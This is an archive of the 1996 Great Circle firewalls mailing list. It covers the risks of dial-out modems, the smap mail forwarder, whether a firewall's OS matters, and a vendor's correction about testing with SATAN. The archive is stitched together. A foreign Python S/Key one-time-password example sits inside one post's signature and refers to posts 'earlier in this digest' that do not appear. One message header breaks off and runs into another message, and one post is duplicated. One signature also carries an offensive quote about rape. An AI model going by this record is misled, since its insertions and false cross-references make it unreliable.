From firewalls-owner Wed Feb 7 15:32:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA01436 for firewalls-outgoing; Wed, 7 Feb 1996 13:50:16 -0800 (PST) Received: from pfg-bh.principal.com (pfg-bh.principal.com [204.167.169.66]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA01402 for ; Wed, 7 Feb 1996 13:49:52 -0800 (PST) Received: (from uucp@localhost) by pfg-bh.principal.com (8.6.12/8.6.11) id PAA21483 for ; Wed, 7 Feb 1996 15:51:14 -0600 Received: from mailhub1.principal.com(162.131.2.16) by pfg-bh.principal.com via smap (V1.3) id sma021476; Wed Feb 7 15:50:45 1996 Received: from pfgmvs1.principal.com by mailhub1.principal.com; Wed, 7 Feb 96 15:45:54 -0600 Received: from PFGMVS1 by PFGMVS1 (IBM MVS SMTP V3R1) with BSMTP id 0414; Wed, 07 Feb 96 15:48:12 CST Date: Wed, 7 Beb 96 15:47:41 CST To: Cc: "*internet " <*INTERNE%EMC2TNN@PFGMVS1.principal.com> From: "HEROLD.BECKY" Subject: Dial-out risks Message-Id: <31191d936ebc002@mailhub1.principal.com> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

An important key to the success of a firewall is ensuring employees use it! This can require quite the sales job. In order to get buy-in (hopefully going from top management down through the ranks) it is necessary (in our organization anyway) to explain to people why what they want to do is a bad thing for the corporate network.

One of the bad things people will want to do is install modems on PCs that are attached to the WAN and use them for "dial-out only". It is a challenging task to convince them that doing this DOES create a risk, even if they are using a non-DID phone line. (Especially if the WAN has tens of thousands of nodes spread across a geographically huge area.)

At the beginning of January I posted a request for information on specific risks in putting modems on PCs that (supposedly) will be used for dial-out access only.
It is assumed that the PCs are running IP, and may not be going directly to the Internet, but dialing out to other public networks such as AOL, CompuServe, Prodigy, etc.... It is also assumed that the PC may have the full set of Internet services installed, which we've found is the default for many OSs, and which, if it is not the default, can easily be loaded by most people determined they want to use the services.

This information will be used in awareness messages and discussions with employees about why, typically, they need to access the Internet through the firewall.

I've had some requests to post the responses I received. The following is a summary of the responses, along with some additional information I found after I posted the question. Much thanks to those of you who helped me! Since several of the responses were similar, I'm omitting attributions to them. Please, those of you who are more versed in the technical aspects of these risks than I, let me know any errors you see! Also, please contribute more risks and methods of reducing them that you can think of.

-----------------------------------------------------------------------------

* Since IP is a two-way protocol, someone could gain access to the dial-out PC hard drive (and any networked system) during the dial-out session. This is true even when using the non-DID line (which basically protects against war-dialers in the event the dial-out user leaves the modem on all the time).
* Viruses and trojans can be placed on the dial-out hard drive.
* Any files copied to diskettes and placed on the network could cause problems network-wide.
* Trojans can collect such goodies as passwords, credit card numbers, etc...anything passing over the network lines.
* The dial-out PC could be used as a repository.
* If the person dials out consistently around the same time each day, or specific days of the week, a hacker can identify when the person is connected and plant the malicious code on the PC or network during those times.
* Since Windows 95, Windows for Workgroups, and other systems have remote communications capabilities built in, it becomes a bigger risk to have dial-out access because of potential macros included in files shared through these systems. It is best to turn these options off when installing the OS.
* FAX systems can be used to transfer files as data rather than images under certain circumstances. A typical use would be to send Word documents with a hole for Word viruses.
* The OS of networked PCs may be screwed up by the mixing and matching of IP stacks and clients that this sort of thing implies. For example, one incarnation of C$'s software unobviously messed with WINSOCK.DLL for one respondent, which led to lots of problems trying to debug. The supportability of allowing people to mess with their PC's OS when installing dial-out software/modem needs to be considered.
* IP Spoofing
* Session hijacking
* Users with little PC/systems knowledge installing systems on their dial-out PC that ultimately open up the entire network (e.g., enabling the IP routing feature).
* Dial-out employees allowing non-employees (e.g., friends, family, etc.) to use their dial-out machine as a dial-in machine to bounce them to the Internet, resulting once again in opening up the entire network. {I don't have the technical details of how this could be done....does anyone care to share?}
* Denial of service attacks
* Files on the dial-out PC may be copied, deleted, and possibly modified.
* Files may also be copied to, deleted, or modified on the other systems attached to the network.
* Changes may be made to network systems which could prevent access to the network by legitimate users.
If anyone could point to a site with more technical information about these attacks, or provide information to this list, that would be great!

Here were the suggestions for dealing with the threats:

* Have a strong policy clearly indicating acceptable remote access methods. {Definitely agree!}
* Don't allow full network services on the PCs. {Great advice...but how? Is there a monitoring device that can determine which PCs are running the services? How are you going to keep 18,000+ people, many of whom are PC-literate enough, from loading the services? Policies are good and necessary, but they are not preventive controls.}
* Educate the employees of the risks so they won't be as likely to do something inadvertently risky. {Absolutely agree! Will definitely help the 80% - 90% of people that want to do the right thing.}
* Scan all PCs for viruses regularly, and downloaded files immediately. {Yes!}
* Check PCs for Trojans regularly. {What's the most efficient way to do this?}
* Encrypt confidential/proprietary data files residing on PCs and attached computer systems. {Getting info on this by subscribing to cypherpunks}
* Use non-DID (outgoing calls only) phone lines to eliminate risks created when people leave their modems on, but are not actively connected.
* Do a network/risk assessment to determine where your weaknesses are.
* Require users to sign a usage policy.
* Require users to pass through an authentication server to dial-out, using a single-use password token.

Thanks,
Becky Herold, Sr. Systems Analyst, Information Protection
herold.becky@principal.com
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
The opinions expressed here are strictly my own and do not necessarily represent those of my employer.
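The "single-use password token" in Becky's last suggestion, and the "non-replayable" authentication Bob Bosen and Jeromie Jackson discuss earlier in this digest (S/Key is one of the challenge-response systems named there), as an added example that is not code from any of the posts: an S/Key-style hash-chain one-time password, with the server rejecting a replayed or forward-hashed password. The class and function names and the seed value are this example's own; it uses SHA-256 where the original S/Key used MD4.

```python
# Added example (not from the list posts): an S/Key-style hash-chain
# one-time password. The server keeps only the last accepted chain element,
# never the seed, so a captured password is useless a second time.
# Class/function names and the seed value are this example's own.
import hashlib
import hmac
from typing import Tuple


def _h(data: bytes) -> bytes:
    """One step of the chain (S/Key used MD4; SHA-256 here)."""
    return hashlib.sha256(data).digest()


class SkeyClient:
    """The user's side: keeps the secret seed and computes chain elements."""

    def __init__(self, secret: bytes) -> None:
        self._secret = secret

    def password(self, n: int) -> bytes:
        """Return H^n(secret), the one-time password for iteration n."""
        x = self._secret
        for _ in range(n):
            x = _h(x)
        return x


class SkeyServer:
    """The server side: stores only the last accepted element.

    Someone who sniffs H^n(secret) can compute H^(n+1), which the server
    will never accept again, but not H^(n-1), which it asks for next.
    """

    def __init__(self, top: bytes, count: int) -> None:
        self._last = top      # H^count(secret), delivered once at enrollment
        self._count = count   # passwords left before the chain is exhausted

    def challenge(self) -> int:
        """Iteration number the client must answer with next."""
        return self._count - 1

    def login(self, response: bytes) -> bool:
        """Accept iff H(response) equals the stored element; then advance."""
        if self._count <= 0:
            return False          # chain exhausted: user must re-enroll
        if not hmac.compare_digest(_h(response), self._last):
            return False          # wrong, replayed, or stale password
        self._last = response     # the chain moves one step toward the seed
        self._count -= 1
        return True


def enroll(secret: bytes, chain_length: int) -> Tuple[SkeyClient, SkeyServer]:
    """Enrollment: only the top of the chain is handed to the server."""
    client = SkeyClient(secret)
    server = SkeyServer(client.password(chain_length), chain_length)
    return client, server


def demo() -> Tuple[bool, bool, bool, bool]:
    """One login, a replay of the captured password, the captured password
    hashed forward (all a sniffer can compute), then the next real login."""
    client, server = enroll(b"constructed-demo-seed", 100)   # constructed seed
    captured = client.password(server.challenge())           # H^99, as seen on the wire
    first = server.login(captured)                           # accepted
    replay = server.login(captured)                          # rejected: chain moved on
    forward = server.login(_h(captured))                     # rejected: H^100 is stale
    second = server.login(client.password(server.challenge()))  # H^98: accepted
    return first, replay, forward, second
```

As Jeromie Jackson notes above, this protects only the login exchange; the session that follows it carries no authentication of its own.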
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

From firewalls-owner Wed Feb 7 15:38:52 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA02199 for firewalls-outgoing; Wed, 7 Feb 1996 14:03:47 -0800 (PST) Received: from gaia.aoainc.com (gaia.aoainc.com [199.93.216.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA02189 for ; Wed, 7 Feb 1996 14:03:35 -0800 (PST) Received: (from uucp@localhost) by gaia.aoainc.com (8.6.12/8.6.9) id RAA21988; Wed, 7 Feb 1996 17:02:43 -0500 Received: from aoa.aoainc.com(199.93.217.20) by gaia.aoainc.com via smap (V1.3) id sma021985; Wed Feb 7 17:02:21 1996 Received: from albedo.aoainc.com. (albedo.aoainc.com [199.93.217.155]) by aoa.aoainc.com (8.6.9/8.6.9) with SMTP id RAA27113; Wed, 7 Feb 1996 17:02:20 -0500 Message-ID: Date: Wed, 7 Feb 96 17:01:04 -0400 From: "Richard L. Snow" Subject: Re: firewalls, email, and dns To: "Lehrer, Neil" , firewalls@GreatCircle.COM X-Mailer: VersaTerm Link v1.1.1 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>hi,
>
>our smtp mail server is an smtp/mhs gateway that runs on DOS. since it
>does not have the traditional sendmail vulnerabilities can I/should I
>allow smtp traffic through a firewall []

Well, it's pretty easy to use a mail forwarder such as SMAP in the TIS firewalls toolkit. If your firewall is unix you can replace the sendmail daemon with this program, which is short enough that you could actually figure out what the code is doing. The traditional argument is that if the program is complex enough that you can't tell what its behavior will be, then there is a high risk there is a hole in there which you don't know about.

-Rich

Rich Snow rich@aoainc.com (617)864-0201
-----------------------------------------------*
Adaptive Optics Associates, Inc. 54 Cambridgepark Dr., Cambridge, MA.
02140

From firewalls-owner Wed Feb 7 15:47:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA02198 for firewalls-outgoing; Wed, 7 Feb 1996 14:03:45 -0800 (PST) Received: from grendel.texas.net (grendel.texas.net [204.96.23.204]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA02188 for ; Wed, 7 Feb 1996 14:03:35 -0800 (PST) Received: (from stend@localhost) by grendel.texas.net (8.6.10/8.6.9) id PAA09076; Wed, 7 Feb 1996 15:25:08 -0600 Date: Wed, 7 Feb 1996 15:25:08 -0600 From: Sten Drescher Message-Id: <199602072125.PAA09076@grendel.texas.net> To: "Kenneth J. Stephens" CC: goertzek@wangfed.com, firewalls@GreatCircle.COM In-reply-to: "Kenneth J. Stephens"'s message of Tue, 6 Feb 1996 10:40:05 -0500 (EDT) Subject: Re: Survey References: <199602061540.KAA18136@Fe3.rust.net> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

"Kenneth J. Stephens" said:
KJS> If the magazine publishers forced the issue date onto all of
KJS> their reprints the vendors would have little use for the
KJS> reprints. The date stamp would obsolete the reprint so quickly
KJS> that the vendor would look foolish for distributing old info.
KJS> One of the hazards of a dynamic industry.

Given the number of computer manufacturers which clearly include the DATE of the publication in which their products were selected a Best Buy/Editors Choice/etc., this is ludicrous. Personally, if I were to receive an undated reprint of a magazine review as part of a product's promotional literature, my most favorable reaction would be to place it in the circular file, with my most probable being wondering why they don't want me to know how old the review is. OTOH, if I received reprints dated, say, June 1994, May 1995, and September 1995, that would show me that not only does this company develop a good product, but that they maintain a good product, which, to me, is extremely important.
--
#include /* Sten Drescher */
Unsolicited email advertisements will be proofread for a US$100/page fee.
CDA Bait: Look, I have two daughters who haven't been laid yet. How about you rape them right here, instead of my guests? Gen 19:8

From firewalls-owner Wed Feb 7 15:51:57 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA02485 for firewalls-outgoing; Wed, 7 Feb 1996 14:09:10 -0800 (PST) Received: from icicle.winternet.com (icicle.winternet.com [198.174.169.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id OAA02442 for ; Wed, 7 Feb 1996 14:08:55 -0800 (PST) Received: from parka (dufresne@parka.winternet.com [198.174.169.9]) by icicle.winternet.com (8.7.3/8.7.2) with ESMTP id QAA10210; Wed, 7 Feb 1996 16:07:40 -0600 (CST) Received: (from dufresne@localhost) by parka (8.6.12/8.6.12) id QAA03253; Wed, 7 Feb 1996 16:07:39 -0600 Posted-Date: Wed, 7 Feb 1996 16:07:39 -0600 Date: Wed, 7 Feb 1996 16:07:38 -0600 (CST) From: Ron DuFresne To: Chris Jenkins cc: winnt-l@eva.dc.lsoft.com, jeromie@garrison.com, firewalls@GreatCircle.COM, SATEESHB@inf.com Subject: Re: NT's TCP/IP stack + NetManage NEWT conflict. -Reply In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

On Wed, 7 Feb 1996, Chris Jenkins wrote:
> all of the newest (and even WFW311) come with a free TCPIP stack.
> Third party applications like Chameleon, LanWorkPlace, etc....come with
> their own stacks. In most cases, you should be able to get applications
> (Telnet, FTP, mail, etc) from one third-party product to work over another's
> TCP/IP stack. This is where the WINSOCK standard comes in.
>
> More specialized TCP/IP functions running on Windows (such as XServer,
> 3270, etc) may require a stack/Winsock specific to that particular product.
>
> Since MS gives you TCP/IP and WINSOCK, most third party applications
> should be able to run.
> If I recall correctly, I think that some of Chameleon's
> applications will run on MS tcp/ip stack.

Yes, this is true, but you don't want to run newt with the other stack active. At one site we worked with we found wfw311 and newt in continual conflict. When just running newt, a version prior to 5.0 <3.5-4.0 I think we ran> it was very unstable. We weren't very impressed and ended up tossing newt to the sidelines.

Later,
Ron DuFresne
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just don't touch anything.

From firewalls-owner Wed Feb 7 16:07:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA05145 for firewalls-outgoing; Wed, 7 Feb 1996 14:46:20 -0800 (PST) Received: from usia.gov (XGATE.USIA.GOV [198.67.64.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA05132 for ; Wed, 7 Feb 1996 14:46:15 -0800 (PST) Received: from NetWare MHS (SMF70) by usia.gov via Connect2-SMTP 4.00; Wed, 7 Feb 96 17:45:57 -0500 Message-ID: <2C1D19310136C8D1@usia.gov> Date: Wed, 7 Feb 96 17:44:07 -0500 From: "Lehrer, Neil" Organization: USIA To: firewalls@greatcircle.com Subject: fw-1 and smapd X-mailer: Connect2-SMTP 4.00 MHS to SMTP Gateway Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

hi,

are any of you firewall-1 customers putting smap on your firewall as the mail redirector? any other way to do this? i didn't see anything in the fw-1 manual other than having a rule that lets outside email go through the wall to your inside mail server and trust that? cc to my email address would be great. thanks.

Regards
+++++++++++++++++++++++++++++++++++++++
+ Neil Lehrer
+ U.S.
Information Agency
+ Networks and Systems Support Division
+
+ voice 202 619-0903
+ fax 202 619-3883
+ internet nlehrer@usia.gov
+
+ "oh what a tangled net we weave
+ when we seek to retrieve."
+
+++++++++++++++++++++++++++++++++++++++

From firewalls-owner Wed Feb 7 16:09:18 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA06460 for firewalls-outgoing; Wed, 7 Feb 1996 15:07:44 -0800 (PST) Received: from mail.ganton-mcr.com (mail.ganton-mcr.com [206.233.102.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA06448 for ; Wed, 7 Feb 1996 15:07:36 -0800 (PST) Received: from kia.mazama.com (sfsp95.slip.net [204.160.88.159]) by mail.ganton-mcr.com (8.6.11/8.6.9) with SMTP id PAA26783; Wed, 7 Feb 1996 15:12:36 -0800 Date: Wed, 7 Feb 1996 15:05:27 -0800 (PST) From: Larry Stelmat To: firewalls@greatcircle.com cc: info@mazama.com Subject: Re: Mazama Packet Filter: Misleading advertising In-Reply-To: <311763D4.3843@csc.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

We'd like to thank Darren Reed for pointing out a poorly worded segment of our old product description. Our intent was to communicate that we had run Satan on several MPF installations and that MPF, properly configured, managed to detect and stop most of the attacks that SATAN attempts to use.

The history was that earlier information did not mention SATAN, and we got frequent e-mail asking us if we had tested MPF with SATAN. So around summer we started mentioning SATAN in later sales information. After being revised four times or more by three different people, the original intent and statement was more than a bit mangled. It is true that the current version of MPF does detect hosts that are scanning port space or address space.

At MSL, our primary mission is to build a better product at a lower price. Unfortunately we have a limited number of resources.
Our primary resources go into development and testing of MPF with marketing trailing as dead last. The result of which is our product is well tested (including documentation), but our sales material is crafted quickly and without much time for review. We again want to thank Darren for pointing out our problem. The efforts to ensure that published information is accurate make the Internet a great place to do business.

David Bonn, President
Mazama Software Labs
david@mazama.com

> The following appears on one of their web pages:
> (http://www.mazama.com/mpf12desc.html):
> ...
> TECHNICAL SECURITY FEATURE LIST
>
> _________________________________________________________________
>
> * Blocking of all services which are not explicitly enabled.
> * Blocking of ICMP Redirect Packets.
> * Blocking of IP Source Route options.
> * Blocking of Spoofed IP addresses.
> * Blocking of Spoofed IP fragments.
> * Dangerous services such as rsh/rlogin, X window, Openwindows, NFS,
>   and other RPC services are blocked by default.
> * TCP Services use SYN/ACK checking to verify the direction of all
>   TCP connections.
> * We have used SATAN to analyze MPF installations and verified that
>   the above security problems are solved by MPF. The current version
>   of MPF can detect port scans from SATAN and automatically block
>   all packets from a host running SATAN.
> ...
>
> The last item is what I would draw your attention to.
>
> SATAN does *NOT* test all of the above. In fact, it only does the first.
> Well, to be pedantic, it doesn't look for blocked services, but scans
> looking for services which are active and are possible avenues for a
> breakin. That is unless they developed their own plug-in tests for SATAN,
> which their web page doesn't brag about, so I'll assume to not be the case
> O:).
>
> Maybe they assumed that their DHB (Dynamic Host Blocking) solved everything
> when it blocks out an entire host when it notices a SATAN style attack.
> > Now, if they had of mentioned ISS, I might take it more seriously and > assume > that maybe 3 or more of the above had been checked... > > IMHO, that particular page stinks...(you can find other rich comments > there, > too...)...probably from Marcus's dead chicken that they waved around and > dropped there ;) > > darren > > (p.s. chris, if you get an order from a certain company, you owe me one > ;-) > > From firewalls-owner Wed Feb 7 16:12:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id OAA04597 for firewalls-outgoing; Wed, 7 Feb 1996 14:38:34 -0800 (PST) Received: from grendel.texas.net (grendel.texas.net [204.96.23.204]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id OAA04547 for ; Wed, 7 Feb 1996 14:38:10 -0800 (PST) Received: (from stend@localhost) by grendel.texas.net (8.6.10/8.6.9) id PAA09076; Wed, 7 Feb 1996 15:25:08 -0600 Date: Wed, 7 Feb 1996 15:25:08 -0600 From: Sten Drescher Message-Id: <199602072125.PAA09076@grendel.texas.net> To: "Kenneth J. Stephens" CC: goertzek@wangfed.com, firewalls@GreatCircle.COM In-reply-to: "Kenneth J. Stephens"'s message of Tue, 6 Feb 1996 10:40:05 -0500 (EDT) Subject: Re: Survey References: <199602061540.KAA18136@Fe3.rust.net> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk "Kenneth J. Stephens" said: KJS> If the magazine publishers forced the issue date onto all of KJS> their reprints the vendors would have little use for the KJS> reprints. The date stamp would obsolete the reprint so quickly KJS> that the vendor would look foolish for distributing old info. KJS> One of the hazards of a dynamic industry. Given the number of computer manufacturers which clearly include the DATE of the publication in which their products were selected a Best Buy/Editors Choice/etc., this is ludicrious. 
Personally, if I were to receive an undated reprint of a magazine review as part of a products promotional literature, my most favorable reaction would be to place it in the circular file, with my most probable being wondering why they don't want me to know how old the review is. OTOH, if I received reprints dated, say, June 1994, May 1995, and September 1995, that would show me that not only does this company develop a good product, but that they maintain a good product, which, to me, is extremely important. -- #include /* Sten Drescher */ Unsolicited email advertisements will be proofread for a US$100/page fee. CDA Bait: Look, I have two daughters who haven't been laid yet. How about you rape them right here, instead of my guests? Gen 19:8 From firewalls-owner Wed Feb 7 16:30:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA08730 for firewalls-outgoing; Wed, 7 Feb 1996 15:44:24 -0800 (PST) Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA08717 for ; Wed, 7 Feb 1996 15:44:17 -0800 (PST) Received: from tsgops.rtp.dg.com by dg-rtp.dg.com (5.4R3.10/dg-rtp-v02) id AA27728; Wed, 7 Feb 1996 18:43:26 -0500 Received: by tsgops.rtp.dg.com (5.4R3.10/200.8.1.3) id AA05372; Wed, 7 Feb 1996 18:43:22 -0500 From: spencerj@dg-rtp.dg.com (Jon Spencer) Message-Id: <9602072343.AA05372@tsgops.rtp.dg.com> Subject: Re: Most Secure Unix? To: weber@iez.com (Rolf Weber) Date: Wed, 7 Feb 1996 18:43:21 -0500 (EST) Cc: spencerj@dg-rtp.dg.com, firewalls@greatcircle.com In-Reply-To: <9601311230.AA16241@spibm02> from "Rolf Weber" at Jan 31, 96 01:30:08 pm X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ... > > So, if a firewall that only protects you against outsiders works perfectly, > > you might reduce your risk by 10%. 
Won't you feel nice and warm and fuzzy!? > > yes, i feel :-) > if the firewall is properly configured, even insiders can't break the > firewall's security. I think perhaps my point wasn't made clearly. The firewall can only be as good as the OS on which it exists. If your firewall is an application on top of an OS, I can break the firewall by breaking the OS. > > > > > Another problem with firewalls being an application is that the firewall > > then does not really provide much protection for WWW sites. Since you > > can't trust the WWW software to run on the firewall (because you can't > > trust the OS), you must either put the WWW server inside of or outside of > > the firewall. If it is outside, then there is no protection for the WWW > > server (and I am certain that we all know of the home pages that have been > > altered by hackers). If the WWW server is on the inside, then you must > > open a hole for anonymous users in the firewall, thus greatly reducing or > > eliminating any security it might have afforded you. > > how could a firewall protect a WWW server? impossible! > the only 'secure' solution is to place it outside and insure this host as > good as possible. Well, "impossible" is a very big word to use! Especially, since this is exactly what we have. If your assumption is that the firewall is an application, then I do agree with you. That is why the functions of a firewall need to be a base component of a high assurance OS (so you know that they work). Then you run the WWW server on that OS, and you (apparently) have the impossible. :-) > > > > > Bottom line is that the firewall is COMPLETELY dependent upon the security > > provided by the OS for its own security - The firewall can be no more > > secure. If I can break into the OS, the firewall is mine to mangle. More > > on thsi below. > > > > [snip] > > > > Jon F. Spencer spencerj@rtp.dg.com (uunet!rtp.dg.com!spencerj) > > Data General Corp. Phone : (919)248-6246 > > 62 T.W. 
Alexander Dr, MS #119 FAX : (919)248-6108 > > Research Triangle Park, NC 27709 Office RTP 121/9 > > > on a typical firewall, there only runs: > -the kernel, i never heard of any breakin with the help of a kernel bug > -a few harmless services such as inetd > -the firewall software, often known, sometimes proven to be good > i trust this stuff, but not the configuration of the firewall, even not mine. > if you want a better security as such one, it's surely *not* your OS, it's > simply not to connect at all. > i don't know if your OS is more or less secure as mine. but, IMHO, it doesn't > matter. human failure, that's the point you have to take care. > > rolf It does matter. And so does limiting the effects of human failure, which will always be present. When you make a human SUPER user, you have amplified that users mistakes. So here is one path to travel to limit human mistakes. But this is not the place for a tutorial on how to deal with the REAL risks of a computing environment. Suffice it to say that if you don't deal with them, your firewall won't work, your home page will be violated, and termites will eat your mouse pad. That is why I reassert that if your base OS (including the admin environment) is not high assurance and does not deal with the real threats, your firewall is not very good. 
Jon From firewalls-owner Wed Feb 7 16:53:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA12762 for firewalls-outgoing; Wed, 7 Feb 1996 16:47:24 -0800 (PST) Received: from alpha2000.tech-comm.com (ns.tech-comm.com [204.251.171.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA12755 for ; Wed, 7 Feb 1996 16:47:20 -0800 (PST) Received: by alpha2000.tech-comm.com; (5.65/1.1.8.2/05Jun95-1217PM) id AA30663; Wed, 7 Feb 1996 18:46:42 -0600 Date: Wed, 7 Feb 1996 18:46:42 -0600 From: Dick Brooks Message-Id: <9602080046.AA30663@alpha2000.tech-comm.com> To: Firewalls@GreatCircle.COM, pcuser@slip67-241.ny.us.ibm.net Subject: Re: Firewalls Product Comparison Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You can find out about IBM's Secure Network Gateway at: http://www.raleigh.ibm.com/sng/sngover.html We used IBM's firewall at one of our customers. It seems to be a high quality product at a reasonable price ($9,999) Dick Brooks dick@tech-comm.com Chief Technical Officer Tel. 205-250-8054 TECH-COMM Inc. 
WWW URL: http://www.tech-comm.com/ THE ONLY COMPANY OFFERING VISA CERTIFIED INTERNET CREDIT CARD PROCESSING SW From firewalls-owner Wed Feb 7 17:56:12 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA13148 for firewalls-outgoing; Wed, 7 Feb 1996 16:52:34 -0800 (PST) Received: from taz.nda.com ([206.0.206.200]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id QAA13116 for ; Wed, 7 Feb 1996 16:52:24 -0800 (PST) Received: (from kovar@localhost) by taz.nda.com (8.7.3/8.7.3) id QAA14547; Wed, 7 Feb 1996 16:52:27 -0800 (PST) From: David Kovar Message-Id: <199602080052.QAA14547@taz.nda.com> Subject: Re: fw-1 and smapd To: nlehrer@usia.gov (Lehrer Neil) Date: Wed, 7 Feb 1996 16:52:26 -0800 (PST) Cc: firewalls@GreatCircle.COM In-Reply-To: <2C1D19310136C8D1@usia.gov> from "Lehrer, Neil" at Feb 7, 96 05:44:07 pm X-Mailer: ELFrom firewalls-owner Thu Feb 8 02:39:10 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA13430 for firewalls-outgoing; Thu, 8 Feb 1996 02:36:04 -0800 (PST) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id CAA13425 for ; Thu, 8 Feb 1996 02:36:00 -0800 (PST) Message-Id: <199602081036.CAA13425@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA266594928; Thu, 8 Feb 1996 21:22:08 +1100 From: Darren Reed Subject: Re: 0.0.0.0 address on LAN To: gaus@znanost.hr (Damir Rajnovic) Date: Thu, 8 Feb 1996 21:22:08 +1100 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <199602080918.KAA17830@hvar.mzt.hr> from "Damir Rajnovic" at Feb 8, 96 10:18:27 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Damir Rajnovic, sie said: > > Hello, > > Someone ask who produce 0.0.0.0 ip address, answer is Win95 (and NT > maybe - don't have it around so can't be shure). 
> Here is excerpt:
>
> Client: 0.0.0.0 (null) Server 255.255.255.255 (broadcast)
> OpCode 0x01: BOOTREQUEST , MAC Address Type: 1, MAC Address Length: 6
> Hops: 0, XID: 0000AF37, trying since 1024 second(s)
>
> and that guy have Win95 on his machine.

Looks like DHCP trying to work. Check the configuration of the Win95 machine for the DHCP setup.

darren

From firewalls-owner Thu Feb 8 03:24:49 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA14974 for firewalls-outgoing; Thu, 8 Feb 1996 03:06:09 -0800 (PST)
Received: from cleese.apana.org.au (dotat-gw.apana.org.au [203.14.159.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id DAA14946 for ; Thu, 8 Feb 1996 03:05:41 -0800 (PST)
Received: (from newton@localhost) by cleese.apana.org.au (8.7.1/8.7) id VAA06734 for firewalls@greatcircle.com; Thu, 8 Feb 1996 21:40:07 +1030 (CST)
Date: Thu, 8 Feb 1996 21:40:07 +1030 (CST)
From: Mark Newton
Message-Id: <199602081110.VAA06734@cleese.apana.org.au>
To: firewalls@greatcircle.com
Subject: The "ULTIMATELY secure firewall" web page
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

I have a need to point out some network security problems to an acquaintance, and thought it'd be effective if I illustrated some of them by pointing him at "The ULTIMATELY secure firewall" page on http://www.iwi.com/pubs/A1firewall.htm. Unfortunately, it seems to have disappeared :-(

Can anyone offer me a pointer to the page?

Thanks in advance,

- mark

--------------------------------------------------------------------
I tried an internal modem,          newton@cleese.apana.org.au
but it hurt when I walked.
Mark Newton ----- Voice: +61-8-3732429 --------------- Data: +61-8-3736006 -----

From firewalls-owner Thu Feb 8 03:38:52 1996
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA16054 for firewalls-outgoing; Thu, 8 Feb 1996 03:23:55 -0800 (PST)
Received: from amcada.amc.uva.nl (amcada.amc.uva.nl [145.18.204.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id DAA16041 for ; Thu, 8 Feb 1996 03:23:41 -0800 (PST)
From: F.Wetzels@amc.uva.nl
Received: from eland.amc.uva.nl by amc.uva.nl (PMDF V4.3-7 #2498) id <01I0YY4KV9JK8WWF6C@amc.uva.nl>; Thu, 8 Feb 1996 12:22:03 +1
Received: from amchelix.amc.uva.nl by eland.amc.uva.nl (5.x/SMI-5.0) id AA27114; Thu, 8 Feb 1996 12:21:57 +0100
Received: by amchelix.amc.uva.nl (5.x/SMI-5.0) id AA00997; Thu, 8 Feb 1996 12:21:48 +0100
Date: Thu, 08 Feb 1996 12:21:48 +0100
Subject: Re: routing table go through firewall ?
